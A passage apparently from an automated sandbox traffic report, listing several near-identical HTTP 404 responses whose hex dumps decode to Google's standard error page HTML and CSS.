6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
